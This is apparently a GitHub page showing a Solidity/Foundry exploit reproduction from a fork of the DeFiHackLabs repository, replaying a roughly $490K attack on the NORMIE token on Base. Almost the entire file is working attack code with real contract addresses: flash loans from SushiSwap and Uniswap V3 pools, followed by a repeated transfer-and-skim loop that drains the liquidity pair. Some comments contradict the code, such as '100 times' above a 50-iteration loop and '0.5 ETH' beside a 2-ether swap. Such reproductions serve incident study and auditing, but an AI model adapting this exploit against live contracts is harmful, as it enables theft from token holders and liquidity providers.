forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
NORMIE_exp.sol
177 lines (104 loc) · 4.88 KB
/
NORMIE_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : $490K
// Attack Tx : https://app.blocksec.com/explorer/tx/base/0xa618933a0e0ffd0b9f4f0835cc94e523d0941032821692c01aa96cd6f80fc3fd
// Price : https://dexscreener.com/base/0x24605e0bb933f6ec96e6bbbcea0be8cc880f6e6f
// @Exploiter sent a message to Normie Deployer:
// https://basescan.org/tx/0x587f14b7ffb30b5013ab0db02e9bc94183817ef34c24a9595f33277e752f81eb
// @Info
// https://x.com/WuBlockchain/status/1794619680428282138
// https://x.com/lookonchain/status/1794680612399542672
contract ContractTest is Test {
address SushiRouterv2 = 0x6BDED42c6DA8FBf0d2bA55B2fa120C5e0c8D7891;
address SLP = 0x24605E0bb933f6EC96E6bBbCEa0be8cC880F6E6f;
address UniswapV3Pool = 0x67ab0E84C7f9e399a67037F94a08e5C664DC1C66;
address WETH = 0x4200000000000000000000000000000000000006;
address NORMIE = 0x7F12d13B34F5F4f0a9449c16Bcd42f0da47AF200;
function setUp() public {
vm.createSelectFork("https://rpc.ankr.com/base", 14952783 - 1);
uint256 ETH_balance_transfer_to_Zero_Address = address(this).balance - 3 ether ;
payable(address(0)).call{value: ETH_balance_transfer_to_Zero_Address}("");
}
function testExploit() public {
console.log("---------------------------------------------------");
console.log("ETH Balance before this attack: ", address(this).balance / 1e18);
console.log("---------------------------------------------------");
// 1. Swap 2 ETH to NORMIE on SushiV2
address[] memory path1 = new address[](2);
path1[0] = WETH;
path1[1] = NORMIE;
Uni_Router_V2(SushiRouterv2).swapExactETHForTokensSupportingFeeOnTransferTokens{value: 2 ether}(
0,
path1,
address(this),
block.timestamp
);
uint256 NORMIE_amount_after_swapping = IERC20(NORMIE).balanceOf(address(this));
console.log("NORMIE amount after swapping", NORMIE_amount_after_swapping / 10 ** 9 );
// 2. Flash Loan from SushiV2 Pair
IUniswapV2Pair(SLP).swap(
0,
5000000000000000,
address(this),
hex"01"
);
// 4. Flash Loan from UniswapV3Pool
Uni_Pair_V3(UniswapV3Pool).flash(
address(this),
0,
11333141501283594,
hex""
);
}
function uniswapV2Call(address, uint256, uint256, bytes calldata) external {
// 3. Transfer all NORMIE to Pair
uint256 NORMIE_amount_after_flashLoan_from_SushiV2 = IERC20(NORMIE).balanceOf(address(this));
console.log("NORMIE amount after FlashLoan From SushiV2", NORMIE_amount_after_flashLoan_from_SushiV2 / 10 ** 9);
IERC20(NORMIE).transfer(SLP, NORMIE_amount_after_flashLoan_from_SushiV2);
}
function uniswapV3FlashCallback(uint256 amount0, uint256 amount1, bytes calldata data) external {
// 5. Approve NORMIE to SushiRouterv2
IERC20(NORMIE).approve(SushiRouterv2, type(uint256).max);
address[] memory path2 = new address[](2);
path2[0] = NORMIE;
path2[1] = WETH;
// 6. Swap 80% NORMIE to WETH on SushiV2
Uni_Router_V2(SushiRouterv2).swapExactTokensForETHSupportingFeeOnTransferTokens(
9066513201026875,
0,
path2,
address(this),
block.timestamp
);
// 7. Trasnfer remian NORMIE to slp
uint256 NORMIE_amount_after_swap_from_SushiV2 = IERC20(NORMIE).balanceOf(address(this));
console.log("NORMIE amount after swap From SushiV2", NORMIE_amount_after_swap_from_SushiV2 / 10 ** 9);
IERC20(NORMIE).transfer(SLP, NORMIE_amount_after_swap_from_SushiV2);
// 8 . Looping tranfer and skim for 100 times
for (uint256 i; i < 50; ++i) {
IUniswapV2Pair(SLP).skim(address(this));
IERC20(NORMIE).transfer(SLP, NORMIE_amount_after_swap_from_SushiV2);
}
// 9. Skim but not tranfer again
IUniswapV2Pair(SLP).skim(address(this));
// 10. Swap 0.5 ETH to NORMIE on SushiV2
address[] memory path1 = new address[](2);
path1[0] = WETH;
path1[1] = NORMIE;
Uni_Router_V2(SushiRouterv2).swapExactETHForTokensSupportingFeeOnTransferTokens{value: 2 ether}(
0,
path1,
address(this),
block.timestamp
);
// 11. Repay FlashLoan to UniV3Pool
IERC20(NORMIE).transfer(UniswapV3Pool, 11446472916296430);
// 12. Calcutelate Profit
console.log("---------------------------------------------------");
console.log("ETH Profit after this attack: ", address(this).balance / 1e18);
console.log("---------------------------------------------------");
}
receive() external payable {}
}